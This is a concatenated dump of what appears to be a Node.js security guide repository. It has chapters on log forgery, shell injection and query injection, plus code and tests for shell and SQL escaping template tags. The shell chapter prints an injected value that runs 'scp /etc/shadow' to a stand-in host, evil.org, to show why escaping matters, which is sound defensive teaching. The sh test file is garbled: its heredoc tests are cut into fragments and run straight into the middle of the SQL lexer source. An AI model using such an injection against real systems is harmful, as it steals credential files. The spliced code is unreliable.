151 | use cases and test cases; file issues; and help to integrate tools
152 | like linters, fuzzers, and vulnerability scanners.
153 |
154 | As described in "[Keeping your dependencies close][]", new third-party
155 | modules are of particular interest to security specialists, but
156 | shouldn't require security review before developers use them on an
157 | experimental basis.
158 |
159 | There are a many workflows that allows people to work independently
160 | and later circle back so that nothing falls through the cracks.
161 | Below is one that has worked in similar contexts:
162 |
163 | 1. The developer (or the automated import script) files a
164 | tracking issue that is a prerequisite for pre-launch review.
165 | 2. If the developer later finds out that they don't plan on using
166 | the unreviewed module, they can close the tracking issue.
167 | 3. The assigned security specialist asks follow-up questions and
168 | reports their findings via the tracking issue.
169 | 4. A common pre-launch script checks queries a module metadata
170 | databased maintained by security to identify still-unvetted
171 | dependencies.
172 |
173 | [BOF]: ../chapter-1/threat-BOF.md
174 | [CRY]: ../chapter-1/threat-CRY.md
175 | [DEX]: ../chapter-1/threat-DEX.md
176 | [EXF]: ../chapter-1/threat-EXF.md
177 | [LQC]: ../chapter-1/threat-LQC.md
178 | [RCE]: ../chapter-1/threat-RCE.md
179 | [SHP]: ../chapter-1/threat-SHP.md
180 | [QUI]: ../chapter-1/threat-QUI.md
181 | [JSConformance]: https://github.com/google/closure-compiler/wiki/JS-Conformance-Framework
182 | [tslint]: https://palantir.github.io/tslint/develop/custom-rules/
183 | [eslint]: https://eslint.org/docs/developer-guide/working-with-rules-new#runtime-rules
184 | [Keeping your dependencies close]: ../chapter-4/close_dependencies.md
185 |
--------------------------------------------------------------------------------
/chapter-6/failing.md:
--------------------------------------------------------------------------------
1 | # When all else fails
2 |
3 | ## Background
4 |
5 | The ["Incident Handlers Handbook"][SANS] discusses at length how to
6 | respond to security breaches, but the main takeaways are:
7 |
8 | * You need to do work before incidents happen to be able to
9 | respond effectively.
10 | * Similar measures can lower the rate of incidents.
11 | * You will still have incidents.
12 | * Being in a position to respond effectively can limit damage when
13 | incidents occur.
14 |
15 | Node's proposed [security working group][security-wg]
16 | includes in its charter measures to route information about
17 | vulnerabilities and fixes to the right places, and coordinate response
18 | and disclosure.
19 |
20 | Package monitoring services like [nodesecurity], GitHub's
21 | [package graph][github graph], [snyk][], and the
22 | [nodejs-sec list][nodejs-sec] aim to help vulnerability reports get to
23 | those who need them.
24 |
25 |
26 | ## Problem
27 |
28 | Threats: [0DY][]
29 |
30 | Node's security working group is working on a lot of preparedness
31 | issues so we only address a few.
32 |
33 | ### Naming is hard
34 |
35 | Each of the groups mentioned above is doing great work trying to help
36 | patches get to those who need them. Each seems to be rolling their own
37 | naming scheme for vulnerabilities.
38 |
39 | The computer security community has a
40 | [centralized naming scheme][CVE-IDs] for vulnerability reports so that
41 | reports don't fall through the cracks. Security responders rarely
42 | have the luxury of dealing with a single stack much less a single
43 | layer of that stack so mailing lists are not sufficient — if
44 | reporters roll their own naming scheme or only disclose via
45 | unstructured text, reports will fall through the cracks.
46 |
47 | ### Logging
48 |
49 | When trying to diagnose a problem, responders often look to log files.
50 | There has been much written on how to protect logs from
51 | [forgery][log injection].
52 |
53 | ```js
54 | console.log(s);
55 | ```
56 |
57 | on a stack node runtime allows an attacker who controls `s` to write
58 | any content to a log.
59 |
60 | ```js
61 | console.log('MyModule: ' + s);
62 | ```
63 |
64 | is a bit better. An attacker has to insert a newline character into
65 | `s` to forge another modules log prefix, and can't get rid of the
66 | previous one.
67 |
68 |
69 | ## Success Criteria
70 |
71 | Incident responders would have the tools necessary to do their jobs if
72 |
73 | * Security specialists can subscribe to a stream of notifications
74 | that include the vast majority of actionable security disclosures.
75 | * Responders can narrow down which code generated which log entries.
76 |
77 |
78 | ## Possible solutions
79 |
80 | ### Naming
81 |
82 | Use CVE-IDs if at all possible when disclosing a vulnerability. There
83 | is a CNA for Node.js but that doesn't cover non-core npm modules and
84 | other CNAs cover runtime dependencies like OpenSSL. If there is no
85 | other CNA that is appropriate, MITRE will issue an ID.
86 |
87 | ### Logging
88 |
89 | On module load, the builtin `module.js` creates a new version of
90 | `require` for each module so that it can make sure that the module path
91 | gets passed as the module parent parameter.
92 |
93 | The same mechanism could create a distinct `console` logger for each
94 | module that narrows down the source of a message, and makes it
95 | unambiguous where one message ends and the next starts. For example:
96 |
97 | 1. Replace all `/\r\n?/g` in the log message text with `'\n'`
98 | and emit a CRLF after the log message to prevent forgery by
99 | line splitting.
100 | 2. Prefix it with the module filename and a colon.
101 |
102 | With this, an incident responder reading a log message can reliably
103 | tell that the module mentioned is where the log message originated, as
104 | long as the attacker didn't get write access to the log file.
105 | Preventing log deletion by other processes is better handled by
106 | Linux's `FS_APPEND_FL` and similar mechanisms than in node.
107 |
108 | [nodesecurity]: https://nodesecurity.io/advisories
109 | [github graph]: https://github.com/blog/2447-a-more-connected-universe
110 | [snyk]: https://snyk.io/vuln?packageManager=npm
111 | [nodejs-sec]: https://groups.google.com/group/nodejs-sec
112 | [CVE-IDs]: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures#CVE_identifiers
113 | [log injection]: https://www.owasp.org/index.php/Log_Injection
114 | [0DY]: ../chapter-1/threats.md
115 | [SANS]: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
116 | [security-wg]: https://github.com/nodejs/security-wg
117 |
--------------------------------------------------------------------------------
/chapter-7/child-processes.md:
--------------------------------------------------------------------------------
1 | # Shell injection
2 |
3 | Threats: [SHP][]
4 |
5 | The [`shelljs` module][shelljs] allows access to the system
6 | shell. We focus on `shelljs`, but similar arguments apply to builtins
7 | like `child_process.spawn(cmd, { shell: ... })` ([docs][cp.spawn]) and
8 | similar modules.
9 |
10 | `shelljs` has some nice programmatic APIs for common shell commands
11 | that escape arguments.
12 |
13 | It also provides `shell.exec` which allows full access to the shell
14 | including interpretation of shell meta characters.
15 |
16 | Solving [shell injection][SHP] is a much harder problem than query
17 | injection since shell scripts tend to call other shell scripts, so
18 | properly escaping arguments to one script doesn't help if the script
19 | sloppily composes a sub-shell. The problem of tools that trust their
20 | inputs is not limited to shell scripts: see discussion of image decoders
21 | in [BOF][].
22 |
23 | The [shell grammar][] has more layers of interpretation so is arguably
24 | more complex than any one SQL grammar.
25 |
26 | We can do much better than string concatenation though. The code
27 | below is vulnerable.
28 |
29 | ```js
30 | shelljs.exec("executable '" + x + "'")
31 | ```
32 |
33 | If an attacker causes
34 |
35 | ```js
36 | x = " '; scp /etc/shadow evil@evil.org/; echo ' ";
37 | ```
38 |
39 | then what gets passed to the shell is
40 |
41 | ```js
42 | executable ' '; scp /etc/shadow evil@evil.org/; echo ' '
43 | ```
44 |
45 | Instead, consider:
46 |
47 | ```js
48 | shelljs.exec`executable ${x}`
49 |
50 | shelljs.exec`executable '${x}'`
51 | ```
52 |
53 | This use of tagged templates is roughly equivalent to
54 |
55 | ```js
56 | shelljs.exec(["executable ", ""], x)
57 |
58 | shelljs.exec(["executable \'", "\'"], x)
59 | ```
60 |
61 | This way, when control reaches `shelljs`, it knows which strings came
62 | from the developer: `["executable ", ""]`, and which are inline
63 | expressions: `x`. If `shelljs` properly escapes the latter, it
64 | prevents the breach above.
65 |
66 | The accompanying example ([code][sh-code]) includes a tag
67 | implementation for `sh` and `bash` that recognizes complex nesting
68 | semantics.
69 |
70 | We can't, working within the confines of Node, prevent poorly written
71 | command line tools from breaking when exposed to untrusted inputs, but
72 | we can make sure that we preserve the developer's intent when they
73 | write code that invokes command line tools. For projects that have
74 | legitimate reasons for invoking sub-shells, consistently using
75 | template tags like this solves some problems and makes it more likely
76 | that effort spent hardening command line tools will yield fruit.
77 |
78 | [shell grammar]: http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_10
79 | [shelljs]: https://www.npmjs.com/package/shelljs
80 | [cp.spawn]: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options
81 | [SHP]: ../chapter-1/threat-SHP.md
82 | [BOF]: ../chapter-1/threat-BOF.md
83 | [sh-code]: https://github.com/mikesamuel/sh-template-tag
84 |
--------------------------------------------------------------------------------
/chapter-7/examples/sh/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "sh-template-tag",
3 | "description": "string template tags for safely composing shell strings",
4 | "keywords": [
5 | "shell",
6 | "child_process",
7 | "security",
8 | "injection",
9 | "template",
10 | "template-tag",
11 | "string-template",
12 | "sec-roadmap",
13 | "es6"
14 | ],
15 | "version": "0.0.0",
16 | "author": "Mike Samuel",
17 | "license": "Apache-2.0",
18 | "main": "index.js",
19 | "files": [
20 | "index.js"
21 | ],
22 | "dependencies": {
23 | "template-tag-common": ">=1.0.2"
24 | },
25 | "devDependencies": {
26 | "chai": ">=4.1.2",
27 | "eslint": ">=4.15.0",
28 | "eslint-config-strict": "*",
29 | "eslint-config-standard": "*",
30 | "mocha": ">=4.0.1",
31 | "standard": "*"
32 | },
33 | "scripts": {
34 | "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && ./node_modules/.bin/mocha"
35 | },
36 | "eslintConfig": {
37 | "extends": [
38 | "strict",
39 | "standard"
40 | ]
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/chapter-7/examples/sh/test/test.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | /* eslint "id-length": off */
19 |
20 | const { expect } = require('chai')
21 | const { describe, it } = require('mocha')
22 | const { sh, ShFragment, makeLexer } = require('../index')
23 |
24 | /**
25 | * Feeds chunks to the lexer and concatenates contexts.
26 | * Tests that the lexer ends in a valid end state and
27 | * appends '_ERR_' as an end state if not.
28 | */
29 | function tokens (...chunks) {
30 | const lexer = makeLexer()
31 | const out = []
32 | for (let i = 0, len = chunks.length; i < len; ++i) {
33 | out.push(lexer(chunks[i])[0] || '_')
34 | }
35 | try {
36 | lexer(null)
37 | } catch (exc) {
38 | out.push('_ERR_')
39 | }
40 | return out.join(',')
41 | }
42 |
43 | // Unwrap an ShFragment, failing if the result is not one.
44 | function unwrap (x) {
45 | if (x instanceof ShFragment) {
46 | return String(x)
47 | }
48 | throw new Error(`Expected ShFragment not ${JSON.stringify(x)}`)
49 | }
50 |
51 | // Run a test multiply to exercise the memoizing code.
52 | function runShTest (golden, test) {
53 | for (let i = 3; --i >= 0;) {
54 | if (golden === '_ERR_') {
55 | expect(test).to.throw()
56 | } else {
57 | expect(unwrap(test())).to.equal(golden)
58 | }
59 | }
60 | }
61 |
62 | describe('sh template tags', () => {
63 | describe('lexer', () => {
64 | it('empty string', () => {
65 | expect(tokens('')).to.equal('_')
66 | })
67 | it('word', () => {
68 | expect(tokens('foo')).to.equal('_')
69 | })
70 | it('words', () => {
71 | expect(tokens('foo bar baz')).to.equal('_')
72 | })
73 | it('words split', () => {
74 | expect(tokens('foo bar', ' ', 'baz')).to.equal('_,_,_')
75 | })
76 | it('parens', () => {
77 | expect(tokens('foo (bar) baz')).to.equal('_')
78 | })
79 | it('parens split', () => {
80 | expect('_,_,(,_,_,_').to.equal(
81 | tokens('foo', ', ', '(bar', ')', ' ', 'baz'))
82 | })
83 | it('parens hanging split', () => {
84 | expect('_,_,(,(,(,_ERR_').to.equal(
85 | tokens('foo', ', ', '(bar', ' ', 'baz'))
86 | })
87 | it('quotes embed subshell', () => {
88 | expect('",$(,_').to.equal(
89 | tokens(' "foo', '$(bar ', ' baz)" boo'))
90 | })
91 | it('quotes embed arithshell', () => {
92 | expect('",$((,$((,",_').to.equal(
93 | tokens(' "foo', '$((bar ', '(far)', ' baz))', 'q" boo'))
94 | })
95 | it('quotes embed backticks', () => {
96 | expect('",`,`,",_').to.equal(
97 | tokens(' "foo', '`bar ', '(far)', ' baz`', 'q" boo'))
98 | })
99 | it('escape affects subshell', () => {
100 | expect('",",",",_').to.equal(
101 | tokens(' "foo', '\\$((bar ', '(far)', ' baz))', 'q" boo'))
102 | })
103 | it('single quotes do not embed', () => {
104 | expect(`',',',',_`).to.equal(
105 | tokens(
106 | ' \' $(',
107 | 'foo) $((',
108 | 'bar))',
109 | ' `',
110 | ' ` # \' '))
111 | })
112 | it('unterminated comment', () => {
113 | expect('#,_ERR_').to.equal(
114 | tokens(' #foo'))
115 | })
116 | it('terminated comment', () => {
117 | expect('_').to.equal(
118 | tokens(' #foo\n'))
119 | })
120 | it('terminated comment split', () => {
121 | expect('#,_').to.equal(
122 | tokens(' #foo', 'bar\n'))
123 | })
124 | it('arithshell', () => {
125 | expect('_,$((,$((,_,_').to.equal(
126 | tokens('foo', ' $((bar ', '(far)', ' baz))', ' boo'))
127 | })
128 | it('backticks', () => {
129 | expect('_,`,`,_,_').to.equal(
130 | tokens('foo', '`bar ', '(far)', ' baz`', ' boo'))
131 | })
132 | it('subshell paren disambiguation', () => {
133 | expect('$(,(,$(,",_,_').to.equal(tokens(
134 | 'echo "$(foo ', ' | (bar ', ' baz)', ' boo)', 'far" | ', ''))
135 | })
136 | it('hash not after space', () => {
137 | expect('_,_').to.equal(
138 | tokens('echo foo#', ''))
139 | })
140 | it('hash after space', () => {
141 | expect('#,#,_ERR_').to.equal(
142 | tokens('echo foo #', ''))
143 | })
144 | it('hash concatenation hazard', () => {
145 | expect(() => tokens('#foo')).to.throw()
146 | })
147 | it('intermediate concatenation hazard', () => {
148 | expect(() => tokens('echo foo', '#bar')).to.throw()
149 | })
150 | it('escaped intermediate concatenation hazard', () => {
151 | expect('_,_').to.equal(tokens(
152 | 'echo foo', '\\#bar'))
153 | })
154 | it('simple heredoc', () => {
155 | expect(tokens('cat < {
158 | // Concatenation hazard when no eol at end
159 | expect(tokens('cat < {
162 | expect(tokens('cat < {
165 | expect(tokens('cat << EOF\nFoo', ' bar\nEOF\n')).to.equal('< {
168 | expect(tokens('cat <<-EOF\nFoo', ' bar\nEOF\n')).to.equal('<<-EOF,_')
169 | })
170 | it('bad heredoc label', () => {
171 | expect(() => tokens('cat << "EOF"\nFoo bar\nEOF;')).to.throw()
172 | })
173 | it('missing heredoc label', () => {
174 | expect(() => tokens('cat <<', '\nfoo bar\n', ';')).to.throw()
175 | })
176 | })
177 |
178 | const str = 'a"\'\n\\$b'
179 | const numb = 1234
180 | const frag = new ShFragment(' frag ')
181 | describe('template tag', () => {
182 | it('string in top level', () => {
183 | runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo ${str}`)
184 | })
185 | it('number in top level', () => {
186 | runShTest(`echo '1234'`, () => sh`echo ${numb}`)
187 | })
188 | it('fragment in top level', () => {
189 | runShTest(`echo frag `, () => sh`echo ${frag}`)
190 | })
191 | it('string in dq', () => {
192 | runShTest(`echo "a\\"'\n\\\\\\$b"`, () => sh`echo "${str}"`)
193 | })
194 | it('number in dq', () => {
195 | runShTest(`echo "1234"`, () => sh`echo "${numb}"`)
196 | })
197 | it('fragment in dq', () => {
198 | runShTest(`echo " frag "`, () => sh`echo "${frag}"`)
199 | })
200 | it('string in sq', () => {
201 | runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo '${str}'`)
202 | })
203 | it('number in sq', () => {
204 | runShTest(`echo '1234'`, () => sh`echo '${numb}'`)
205 | })
206 | it('fragment in sq', () => {
207 | runShTest(`echo ' frag '`, () => sh`echo '${frag}'`)
208 | })
209 | it('string in embed', () => {
210 | runShTest(
211 | `echo $(echo 'a"'"'"'\n\\$b')`,
212 | () => sh`echo $(echo ${str})`)
213 | })
214 | it('number in embed', () => {
215 | runShTest(
216 | `echo $(echo '1234')`,
217 | () => sh`echo $(echo ${numb})`)
218 | })
219 | it('fragment in embed', () => {
220 | runShTest(
221 | `echo $(echo frag )`,
222 | () => sh`echo $(echo ${frag})`)
223 | })
224 | it('hash ambig string', () => {
225 | runShTest(`_ERR_`, () => sh`echo foo${str}#bar`)
226 | })
227 | it('hash ambig fragment', () => {
228 | runShTest(`_ERR_`, () => sh`echo foo${frag}#bar`)
229 | })
230 | it('heredoc string', () => {
231 | runShTest(
232 | '\ncat < sh`
234 | cat < {
240 | runShTest(
241 | '\ncat < sh`
243 | cat < {
249 | runShTest(
250 | '\ncat < sh`
252 | cat < {
258 | runShTest(
259 | `
260 | cat < sh`
268 | cat < {
80 | if (errorMessage) {
81 | // Replay the error message if we've already failed.
82 | throw new Error(errorMessage)
83 | }
84 | text = String(text)
85 | while (text) {
86 | const pattern = delimiter
87 | ? DELIMITED_BODIES[delimiter]
88 | : PREFIX_BEFORE_DELIMITER
89 | const match = pattern.exec(text)
90 | if (!match) {
91 | throw new Error(
92 | errorMessage = msg`Failed to lex starting at ${text}`)
93 | }
94 | let nConsumed = match[0].length
95 | if (text.length > nConsumed) {
96 | const chr = text.charAt(nConsumed)
97 | if (delimiter) {
98 | if (chr === delimiter) {
99 | delimiter = null
100 | ++nConsumed
101 | } else {
102 | throw new Error(
103 | errorMessage = msg`Expected ${chr} at ${text}`)
104 | }
105 | } else if (Object.hasOwnProperty.call(DELIMITED_BODIES, chr)) {
106 | delimiter = chr
107 | ++nConsumed
108 | } else {
109 | throw new Error(
110 | errorMessage = msg`Expected delimiter at ${text}`)
111 | }
112 | }
113 | text = text.substring(nConsumed)
114 | }
115 | return delimiter
116 | }
117 | }
118 |
119 | /** A string wrapper that marks its content as a SQL identifier. */
120 | class Identifier extends TypedString {}
121 |
122 | /**
123 | * A string wrapper that marks its content as a series of
124 | * well-formed SQL tokens.
125 | */
126 | class SqlFragment extends TypedString {}
127 |
128 | /**
129 | * Analyzes the static parts of the tag content.
130 | *
131 | * @return An record like { delimiters, chunks }
132 | * where delimiter is a contextual cue and chunk is
133 | * the adjusted raw text.
134 | */
135 | function computeStatic (strings) {
136 | const { raw } = trimCommonWhitespaceFromLines(strings)
137 |
138 | const delimiters = []
139 | const chunks = []
140 |
141 | const lexer = makeLexer()
142 |
143 | let delimiter = null
144 | for (let i = 0, len = raw.length; i < len; ++i) {
145 | let chunk = String(raw[i])
146 | if (delimiter === '`') {
147 | // Treat raw \` in an identifier literal as an ending delimiter.
148 | chunk = chunk.replace(/^([^\\`]|\\[\s\S])*\\`/, '$1`')
149 | }
150 | const newDelimiter = lexer(chunk)
151 | if (newDelimiter === '`' && !delimiter) {
152 | // Treat literal \` outside a string context as starting an
153 | // identifier literal
154 | chunk = chunk.replace(
155 | /((?:^|[^\\])(?:\\\\)*)\\(`(?:[^`\\]|\\[\s\S])*)$/, '$1$2')
156 | }
157 |
158 | chunks.push(chunk)
159 | delimiters.push(newDelimiter)
160 | delimiter = newDelimiter
161 | }
162 |
163 | if (delimiter) {
164 | throw new Error(`Unclosed quoted string: ${delimiter}`)
165 | }
166 |
167 | return { raw, delimiters, chunks }
168 | }
169 |
170 | function interpolateSqlIntoFragment (
171 | { raw, delimiters, chunks }, strings, values) {
172 | // A buffer to accumulate output.
173 | let [ result ] = chunks
174 | for (let i = 1, len = raw.length; i < len; ++i) {
175 | const chunk = chunks[i]
176 | // The count of values must be 1 less than the surrounding
177 | // chunks of literal text.
178 | if (i !== 0) {
179 | const delimiter = delimiters[i - 1]
180 | const value = values[i - 1]
181 | if (delimiter) {
182 | result += escapeDelimitedValue(value, delimiter)
183 | } else {
184 | result = appendValue(result, value, chunk)
185 | }
186 | }
187 |
188 | result += chunk
189 | }
190 |
191 | return new SqlFragment(result)
192 | }
193 |
194 | function escapeDelimitedValue (value, delimiter) {
195 | if (delimiter === '`') {
196 | return mysql.escapeId(String(value)).replace(/^`|`$/g, '')
197 | }
198 | const escaped = mysql.escape(String(value))
199 | return escaped.substring(1, escaped.length - 1)
200 | }
201 |
202 | function appendValue (resultBefore, value, chunk) {
203 | let needsSpace = false
204 | let result = resultBefore
205 | const valueArray = Array.isArray(value) ? value : [ value ]
206 | for (let i = 0, nValues = valueArray.length; i < nValues; ++i) {
207 | if (i) {
208 | result += ', '
209 | }
210 |
211 | const one = valueArray[i]
212 | let valueStr = null
213 | if (one instanceof SqlFragment) {
214 | if (!/(?:^|[\n\r\t ,\x28])$/.test(result)) {
215 | result += ' '
216 | }
217 | valueStr = one.toString()
218 | needsSpace = i + 1 === nValues
219 | } else if (one instanceof Identifier) {
220 | valueStr = mysql.escapeId(one.toString())
221 | } else {
222 | // If we need to handle nested arrays, we would recurse here.
223 | valueStr = mysql.format('?', one)
224 | }
225 | result += valueStr
226 | }
227 |
228 | if (needsSpace && chunk && !/^[\n\r\t ,\x29]/.test(chunk)) {
229 | result += ' '
230 | }
231 |
232 | return result
233 | }
234 |
235 | /**
236 | * Template tag function that contextually autoescapes values
237 | * producing a SqlFragment.
238 | */
239 | const sql = memoizedTagFunction(computeStatic, interpolateSqlIntoFragment)
240 |
241 | exports.Identifier = Identifier
242 | exports.SqlFragment = SqlFragment
243 | exports.sql = sql
244 |
245 | if (global.it) {
246 | // Expose for testing.
247 | // Harmless if this leaks
248 | exports.makeLexer = makeLexer
249 | }
250 |
--------------------------------------------------------------------------------
/chapter-7/examples/sql/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "mysql-template-tag",
3 | "description": "string template tags for safely composing SQL",
4 | "keywords": [
5 | "sql",
6 | "security",
7 | "injection",
8 | "template",
9 | "template-tag",
10 | "string-template",
11 | "sec-roadmap",
12 | "es6"
13 | ],
14 | "version": "0.0.0",
15 | "author": "Mike Samuel",
16 | "license": "Apache-2.0",
17 | "main": "index.js",
18 | "files": [
19 | "index.js"
20 | ],
21 | "dependencies": {
22 | "mysql": "2.15.0",
23 | "template-tag-common": ">=1.0.2"
24 | },
25 | "devDependencies": {
26 | "chai": ">=4.1.2",
27 | "eslint": ">=4.15.0",
28 | "eslint-config-strict": "*",
29 | "eslint-config-standard": "*",
30 | "mocha": ">=4.0.1",
31 | "standard": "*"
32 | },
33 | "scripts": {
34 | "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && TZ=GMT ./node_modules/.bin/mocha"
35 | },
36 | "eslintConfig": {
37 | "extends": [
38 | "strict",
39 | "standard"
40 | ]
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/chapter-7/examples/sql/test/test.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | /* eslint "no-magic-numbers": off */
19 |
20 | const { expect } = require('chai')
21 | const { describe, it } = require('mocha')
22 | const index = require('../index')
23 |
24 | function tokens (...chunks) {
25 | const lexer = index.makeLexer()
26 | const out = []
27 | for (let i = 0, len = chunks.length; i < len; ++i) {
28 | out.push(lexer(chunks[i]) || '_')
29 | }
30 | return out.join(',')
31 | }
32 |
33 | describe('sql template tags', () => {
34 | describe('lexer', () => {
35 | it('empty string', () => {
36 | expect(tokens('')).to.equal('_')
37 | })
38 | it('hash comments', () => {
39 | expect(tokens(' # "foo\n', '')).to.equal('_,_')
40 | })
41 | it('dash comments', () => {
42 | expect(tokens(' -- \'foo\n', '')).to.equal('_,_')
43 | })
44 | it('block comments', () => {
45 | expect(tokens(' /* `foo */', '')).to.equal('_,_')
46 | })
47 | it('dq', () => {
48 | expect(tokens('SELECT "foo"')).to.equal('_')
49 | expect(tokens('SELECT `foo`, "foo"')).to.equal('_')
50 | expect(tokens('SELECT "', '"')).to.equal('",_')
51 | expect(tokens('SELECT "x', '"')).to.equal('",_')
52 | expect(tokens('SELECT "\'', '"')).to.equal('",_')
53 | expect(tokens('SELECT "`', '"')).to.equal('",_')
54 | expect(tokens('SELECT """', '"')).to.equal('",_')
55 | expect(tokens('SELECT "\\"', '"')).to.equal('",_')
56 | })
57 | it('sq', () => {
58 | expect(tokens('SELECT \'foo\'')).to.equal('_')
59 | expect(tokens('SELECT `foo`, \'foo\'')).to.equal('_')
60 | expect(tokens('SELECT \'', '\'')).to.equal('\',_')
61 | expect(tokens('SELECT \'x', '\'')).to.equal('\',_')
62 | expect(tokens('SELECT \'"', '\'')).to.equal('\',_')
63 | expect(tokens('SELECT \'`', '\'')).to.equal('\',_')
64 | expect(tokens('SELECT \'\'\'', '\'')).to.equal('\',_')
65 | expect(tokens('SELECT \'\\\'', '\'')).to.equal('\',_')
66 | })
67 | it('bq', () => {
68 | expect(tokens('SELECT `foo`')).to.equal('_')
69 | expect(tokens('SELECT "foo", `foo`')).to.equal('_')
70 | expect(tokens('SELECT `', '`')).to.equal('`,_')
71 | expect(tokens('SELECT `x', '`')).to.equal('`,_')
72 | expect(tokens('SELECT `\'', '`')).to.equal('`,_')
73 | expect(tokens('SELECT `"', '`')).to.equal('`,_')
74 | expect(tokens('SELECT ```', '`')).to.equal('`,_')
75 | expect(tokens('SELECT `\\`', '`')).to.equal('`,_')
76 | })
77 | })
78 |
79 | function runTagTest (golden, test) {
80 | // Run multiply to test memoization bugs.
81 | for (let i = 3; --i >= 0;) {
82 | let result = test()
83 | if (result instanceof index.SqlFragment) {
84 | result = result.toString()
85 | } else {
86 | throw new Error(`Expected SqlFragment not ${result}`)
87 | }
88 | expect(result).to.equal(golden)
89 | }
90 | }
91 |
92 | describe('sql', () => {
93 | it('numbers', () => {
94 | runTagTest(
95 | 'SELECT 2',
96 | () => index.sql`SELECT ${1 + 1}`)
97 | })
98 | it('date', () => {
99 | runTagTest(
100 | `SELECT '2000-01-01 00:00:00.000'`,
101 | () => index.sql`SELECT ${new Date(Date.UTC(2000, 0, 1, 0, 0, 0))}`)
102 | })
103 | it('string', () => {
104 | runTagTest(
105 | `SELECT 'Hello, World!\\n'`,
106 | () => index.sql`SELECT ${'Hello, World!\n'}`)
107 | })
108 | it('identifier', () => {
109 | runTagTest(
110 | 'SELECT `foo`',
111 | () => index.sql`SELECT ${new index.Identifier('foo')}`)
112 | })
113 | it('fragment', () => {
114 | const fragment = new index.SqlFragment('1 + 1')
115 | runTagTest(
116 | `SELECT 1 + 1`,
117 | () => index.sql`SELECT ${fragment}`)
118 | })
119 | it('fragment no token merging', () => {
120 | const fragment = new index.SqlFragment('1 + 1')
121 | runTagTest(
122 | `SELECT 1 + 1 FROM T`,
123 | () => index.sql`SELECT${fragment}FROM T`)
124 | })
125 | it('string in dq string', () => {
126 | runTagTest(
127 | `SELECT "Hello, World!\\n"`,
128 | () => index.sql`SELECT "Hello, ${'World!'}\n"`)
129 | })
130 | it('string in sq string', () => {
131 | runTagTest(
132 | `SELECT 'Hello, World!\\n'`,
133 | () => index.sql`SELECT 'Hello, ${'World!'}\n'`)
134 | })
135 | it('string after string in string', () => {
136 | // The following tests check obliquely that '?' is not
137 | // interpreted as a prepared statement meta-character
138 | // internally.
139 | runTagTest(
140 | `SELECT 'Hello', "World?"`,
141 | () => index.sql`SELECT '${'Hello'}', "World?"`)
142 | })
143 | it('string before string in string', () => {
144 | runTagTest(
145 | `SELECT 'Hello?', 'World?'`,
146 | () => index.sql`SELECT 'Hello?', '${'World?'}'`)
147 | })
148 | it('number after string in string', () => {
149 | runTagTest(
150 | `SELECT 'Hello?', 123`,
151 | () => index.sql`SELECT '${'Hello?'}', ${123}`)
152 | })
153 | it('number before string in string', () => {
154 | runTagTest(
155 | `SELECT 123, 'World?'`,
156 | () => index.sql`SELECT ${123}, '${'World?'}'`)
157 | })
158 | it('string in identifier', () => {
159 | runTagTest(
160 | 'SELECT `foo`',
161 | () => index.sql`SELECT \`${'foo'}\``)
162 | })
163 | it('number in identifier', () => {
164 | runTagTest(
165 | 'SELECT `foo_123`',
166 | () => index.sql`SELECT \`foo_${123}\``)
167 | })
168 | it('array', () => {
169 | const id = new index.Identifier('foo')
170 | const frag = new index.SqlFragment('1 + 1')
171 | const values = [ 123, 'foo', id, frag ]
172 | runTagTest(
173 | "SELECT X FROM T WHERE X IN (123, 'foo', `foo`, 1 + 1)",
174 | () => index.sql`SELECT X FROM T WHERE X IN (${values})`)
175 | })
176 | })
177 | })
178 |
--------------------------------------------------------------------------------
/chapter-7/libraries.md:
--------------------------------------------------------------------------------
1 | # Library support for Safe Coding Practices
2 |
3 | The way we structure libraries and APIs affect the idioms that are
4 | available to developers.
5 |
6 | If the easiest ways to express ideas are also secure against a
7 | particular class of attack, then developers who have seen ideas
8 | expressed those ways will tend to produce code that is secure
9 | against that class of attack.
10 |
11 | Next, we introduce a few such idioms, show how they can be better
12 | addressed via a rarely used but powerful JavaScript
13 | feature, and end with some ideas on how to foster consistent,
14 | powerful, and secure APIs for a class of problems that often have
15 | security consequences: composing structured strings to send to
16 | external agents.
17 |
--------------------------------------------------------------------------------
/chapter-7/query-langs.md:
--------------------------------------------------------------------------------
1 | # Query injection
2 |
3 | Threats: [QUI][]
4 |
5 | One piece of simple advice to avoid [query injection attacks][QUI] is
6 | "just use [prepared statements][]."
7 |
8 | This is good advice, and the [`mysql`][] library has a
9 | solid, well-documented API for producing secure prepared statements.
10 |
11 | Developers could do
12 |
13 | ```js
14 | const mysql = require('mysql');
15 | ...
16 | connection.query(
17 | 'SELECT * FROM T WHERE x = ?, y = ?, z = ?',
18 | [ x, y, z],
19 | callback);
20 | ```
21 |
22 | which is secure since `.query` calls `mysql.format` under the hood
23 | to escape `x`, `y`, and `z`. Enough developers still do
24 |
